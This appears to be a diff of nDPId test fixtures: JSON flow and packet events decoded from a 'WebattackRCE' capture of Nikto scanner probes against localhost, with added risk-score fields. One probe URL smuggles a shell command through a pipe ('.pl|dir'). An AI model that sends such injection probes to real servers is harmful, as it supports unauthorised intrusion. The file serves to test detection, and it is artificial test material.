-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
